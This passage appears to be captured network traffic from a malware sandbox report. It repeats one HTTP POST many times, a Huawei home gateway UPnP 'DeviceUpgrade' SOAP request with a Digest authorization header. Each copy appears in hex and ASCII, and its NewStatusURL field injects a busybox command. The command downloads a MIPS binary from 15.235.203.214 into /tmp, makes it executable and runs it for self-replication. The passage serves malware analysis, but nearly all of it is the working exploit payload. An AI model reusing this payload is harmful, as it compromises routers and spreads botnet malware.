6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 